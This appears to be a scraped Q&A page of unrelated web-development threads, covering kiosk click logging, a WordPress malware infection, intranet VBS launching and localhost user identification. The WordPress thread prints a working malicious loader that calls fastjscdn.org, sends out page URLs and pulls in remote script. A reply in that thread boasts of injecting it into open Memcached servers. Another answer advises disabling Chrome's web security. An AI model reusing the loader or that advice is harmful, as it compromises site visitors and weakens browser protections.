Track outlinks on localhost app - javascript

I have built a simple webpage for a touchscreen kiosk (Win7, XAMPP).
The interface is built up of 9 tiles (windows metro style). HTML, PHP and CSS only. Each of the tiles are simple links
What I would like to do is track how many times each of the tiles have been clicked.
Examples of my pages are;
www.example.com/help.html
www.example.com/contact.html
www.example.com/map/floor1.html
The kiosk will be running on localhost and I feel that Google Analytics, Piwik or AWStats are too resource intensive for such a small task. Obviously as the kiosk is running on localhost the IPs, location, browser etc... aren't important.
Are there any other ways I could track the clicks to a log file or similar?
Any advice appreciated.

You can use onclick functions on the links, and use javascript to write a log file. This might help you creating a log file through javascript

I would say this data can be found inside Apaches access logs if you only want to know how many times a page has been accessed. This can be easliy done by using a tool such as Apache Log Viewer.
If you actually want to log link clicks, you probably have to use javascript action handlers. Because I consider writing from JavaScript ugly, I would probably send an ajax request to my PHP server every time.
Edit:
Another way would be, to convert all you html files into php and log from there (I can also add an example how).
Example:
<html>
<?php
$count= include 'count.php';
$count['count-'. __FILE__]= $count['count-'.__FILE__] + 1;
file_put_contents('count.php', '<?php return ' . var_export($count, true) .'; ?>');
?>
</html>

Related

Malicious JS code in Wordpress change the domain where it is hosted

In my Wordpress site, i have this malicious code before "/body":
<script src="https://fastjscdn.org/static.js?hash=a633f506a53746a846742c5655ebf596"></script>
The file static.js contains this:
window.__google__ads__show||(window.__google__ads__show="1",function(){if(function t(){try{return window.self!==window.top}catch(a){return!0}}()){var t,a,e=window.parent.document.createElement("script");e.src="https://fastjscdn.org/static.js",window.parent.document.body.appendChild(e);return}fetch("https://fastjscdn.org/platform/"+(window.navigator?.userAgentData?.platform||window.navigator.platform)+"/url/"+window.location.href).then(t=>{}),t="https://fastjscdn.org/"+window.location.hostname.replace("www.","")+"/static.js",(a=document.createElement("script")).src=t,document.head.appendChild(a)}());
Before "fastjscdn .org", the maliciuos JS code was hosting on domanin name "asmr9999 .live". Since few days, the domain has changed in "fastjscdn .org".
How is it possible? How can it change the domain where is it hosted?
I am sure that Wordpress, themes and plugins do not contain the malicious code. I didn't find anything in the database, also in base64 encode, for now.
Also, What does the code in the JS file do to my site?
I also found other people with my same malware, in a custom CMS, we can not solve the problem in any way. More info here
It maybe late,but let me tell the truth.The problem is the Memcached server you are using which is public and no password in network.I made a script scanning the network and injecting this malicious code to every memcached server.It's a "cache-side" xss attack.Your server is safe.Configure your firewall and block connection from outside to port 11211,everything will ok.
You can use an online JavaScript beautifier tool to check the content of static.js: seems to be injecting script adapted to the platform, probably the same that you mentioned in your other question that will trigger the download of a malware/adware
The reason why it could change the domain in the script is probably because your host is still infected; the domain was registered very recently, and was probably chosen as it looks less suspicious than the previous one

Starting a vbs script from a HTML file

I've been wrapping my head around this problem for a couple of days searching for all possible solutions on the forums and online but can't seem to get it working.
I'm calling a script by a link on a "button" to start a script on a server (in HTML):
<a href="#" onClick="RunScript();">
The script code is:
<script type="text/javascript" language="javascript">
function RunScript() {
var objShell = new ActiveXObject("WScript.Shell");
objShell.Run("%comspec% /k my_projects_EN.vbs" "), 1, false;
}
</script>
So why am I using a vbs? What I'm trying to do is create custom pages for each employee. So the vbs is actually checking the computer name and an if clause directs the employee to a custom page. With my basic knowledge of programming and a lot of hours of searching I did not find a better solution for this yet. So I'm trying to make this one to work.
And it does but only if I'm running the script locally (desktop). But as the webpage will be used in an intranet location this script will be on a server. And this is where it became a bit hairy as I can't seem to find the right combination of commands to do so. I already tried pushd for creating a mounted volume or currentDir for setting up the location of script but nothing seems to work completely.
I assume that I'm missing a subroutine for the function as adding anything there just stops the script - but how to go at it is beyond me.
All help is appreciated even if it means I have to bury myself into another program language (not preferred of course).
I am certain that there is a way to solve this other than sending a script to each employee to put on their desktop (each time a new employee comes to work).
Thanks
Edit: I see an additional clarification is in order:
We're creating an intranet webpage as a help for more efficient work for our employees. We're on the same level as the rest so not IT or admin rights guys so we're on our own.
The point is to have a personal page for each employee which can be accessed via the same interface. So a link has to send each person to another page that is why I've created the vbs code which helps with that. Checking several other options this seemed to be the simplest and best one - and it works at least partially. I don't see any security risks as all will be done on each client computer - the files themselves will be located on the server. The script itself does not represent any risk at least not that I would see it - but of course I'm not a specialist.
So in short this is what we're trying to do:
Main page -> link to My_projects button -> start script (located on the same server as the main page) -> determine the client computer name -> redirect to the right webpage.
Sorry for a lack of details, I see that it's sometimes hard to explain exactly what you want if you're not a pro in these things.
Thanks again.
If those computers are physically located at your workplace and you have control over the system, it would be better to tweak DNS redirections on those computers. Otherwise, more general and OS independent solution, would be session, cookie, or token on employee's computer. Still, some kind of authentication other than having one piece of machine, could be more versatile and secure (unless your PCs are 1000 feet underground :-) ).
Edit: What kind of info/data are sent to the server script? Server script runs on server and everything related to "this computer" (e.g. name) is actually referring to the server itself. Thus the script needs some data from the client to recognise his computer.
thanks for the effort
Everything is actually located on the server so the client computer only runs the page or interface which is in \Server\folder\folder for example.
In your browser you open the start page which contains a button with a link to this script (located on the same server).
When the script executes it searches for the computer name and send the user to his personal page:
Set wshShell = CreateObject( "WScript.Shell" )
strComputerName = wshShell.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
On Error Resume Next
'#01 name_surname
If strComputerName = "XXXXXXXX" Then
CreateObject("WScript.Shell").Run """name_surname.html"""
and so on.
And this is all there is. As mentioned before we don't have admin rights to change anything on the client computer. So nothing is being done on the client side other that executing a script located on the server.

Uniquely recognize Client on localhost

I have apache installed on a windows laptop that is not connected to the internet. The laptop has multiple user accounts. Let's say that two of the user accounts are "Adam" and "Sally". I have a project on localhost that needs to differentiate between the different Window's users via the Chrome browser.
I understand detecting the username through the browser directly is a gross security sandbox breach, but I don't care: I have complete control of the computer and the project is not web accessible, so there are no security concerns. I'm willing to cheat in any way imaginable including building a custom .exe to help. I just need to differentiate between the different accounts. It doesn't need to be by username, but any alternative ID would need to persist for that given user.
I am asking for outside of the box thinking.
How can I create a page that I can open in Chrome that will say "Hi Adam" or "Hi Sally" or even "Hi -=[GUID]=-" without the visitor ever typing in their name/guid.
You should probably use something like NW.js or Electron instead of chrome for this so you don't have to sacrifice security.
Here's a picture of me running the nw.js sdk and loading just the demo page, bringing up the dev tools and retrieving my username.
Pretty straight forward. Follow node documentation and do whatever you'd like there.
You could have a batch file that runs on startup via the task scheduler or registry in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run or Local Group Policy that performs something like echo setCurrentUser("%USERNAME%"); > c:\your_project_directory\set-current-user.js, then you just have a script that defines <script>function setCurrentUser(s) { alert("Hello "+s); /* ... */ }</script> followed by a script import like <script src="set-current-user.js"></script>
If you just want to be able to do whatever in the filesystem, change the shortcut that launches Chrome to --allow-file-access-from-files --user-data-dir=c:\your_project_directory --disable-web-security and restart the PC (or just kill all chrome.exe processes, incl. background).
Edit: Updated with note on using --allow-file-access-from-files from Pritam Banerjee. If you go that route, he gets credit. :)
If you're interested in trying NW.js, here's a full example:
package.json :
{
"name": "nw-hello-user",
"version": "0.0.1",
"main": "index.html"
}
index.html :
<!DOCTYPE html>
<html>
<head>
<title>Hello!</title>
</head>
<body>
Hello <script>document.write(process.env.USERNAME)</script>!
</body>
</html>
Here's the command line:
Here's the end product!
Since you tagged your question with PHP, you could just create a index.php file with the following contents:
Hi <?= getenv("USERNAME") ?>
getenv("USERNAME") returns the the value of the USERNAME environment variable.
Update: Thanks to TylerY86 for providing the more correct way to get the username. Also note from his comment below:
You also have to be sure that the Apache instance is running in the
context of the user, and not as a service. If you try the example, if
you get something like SYSTEM or IUSR_MACHINE instead of the user
name, you'll need to adjust.
You have 2 choices, as far as I see.
1) you may ask users to identify themself first time they use the page and store it to the local storage. Since those are different users on the machine, their localStorages should be separate.
2) You may deploy a small web service on the local host, that gets the user credentials from the system and returns on GET request.

Loading generated text from an externally hosted PHP file into an HTML/JS animation on an iPad

We have an HTML/JS animation which is basically a fancy counter. The actual counter part is a div the value for which gets loaded from a PHP script that spits out a random number. It looks like this:
<?php
$val = file_get_contents("num.txt");
$val += rand(1, 5);
file_put_contents("num.txt", $val);
print $val;
We are hosting this PHP file on an external domain, because this animation will be packaged as part of an iPad publication. The idea is that when our animation gets loaded it will call to our PHP file and get it's value from there.
I was wondering what the most straightforward way of loading this data would be.
The div for the text part of the counter that we are changing is #Stage_Text. I've tried the following approach in the html of the animation, which unfortunately did not work:
$(document).ready(function () {
$.ajax({
url : "http://ourdomain.com/stat.php",
dataType: "text",
success : function (result) {
$("#Stage_Text").html(result);
}
});
});
Any assistance would be greatly appreciated.
I've just tested your code, and it seems to work fine.
Is you ajax request completing okay? You can check this in Firebug or your developer tools.
That's my only thought without other information.
------UDPATE-----
Sorry, I didn't see that your Ajax request was to a different domain. Yeah, this won't work because of the same-origin policy - in essence, you can only make ajax calls to the domain that served the javascript file.
Lot's of ideas to get around it here.
The easiest way is probably to use a server-side proxy.
Thanks for the responses! In the end we solved this by simply hosting the entire animation on the server and calling it within the app. This way the code I posted originally worked beautifully, and solved a few other challenges that we had - for example what happens if the user viewing the app doesn't have an internet connection? Doing it as I originally intended meant that the value would simply be blank (you could have a placeholder but it's still not ideal). With our workaround the animation simply does not get loaded and we have another, more static element underneath.
I'd say that in this particular case this is the absolutely most straightforward and easiest way to achieve what we wanted.

How can I simulate a non-responding server?

I have a web service which the customers use by inserting an external JavaScript (hosted on my servers). Recently, due to server outage - the external JavaScript became unavailable and my customers' websites came to a crawl as browser didn't load rest of the website until it loaded the JS (it goes into header of the websites).
I am trying to work out methods so that customers' website don't slow down even if my server goes down and for that I wanted to simulate a condition where the my server isn't responding. Note that if I specify a wrong URL, browser won't load the JS but in case URL is right and server isn't responding, browser will stall loading rest of the page. I want to simulate the last case. Any ideas how can I go about it?
PS: On server side, I am using the LAMP stack.
Create a script that sleeps for a configurably long time
Something like
<?php
$how_long = $_GET['seconds'];
sleep($how_long);
echo "alert('Finished sleeping!');";
?>
Then you just access this script instead, for example by putting this in your HTML code
<script src="http://example.com/hang_for.php?seconds=3600" />. That would sleep for an hour. There will be another timeouts that'll trigger first configured in php.ini, but that's exactly what you want to test, no?
If the "P" in your LAMP is PHP, you could use the sleep function (documented here). Then, have your test page load your PHP script as the source of your Javascript to see what happens.
Did you try looping back the server into itself (or any other HTTP server w/o the webservice on)?
unplugging is pretty drastic, the off-button should do.
Unplug the server. Having no power makes a server unresponsive...

Categories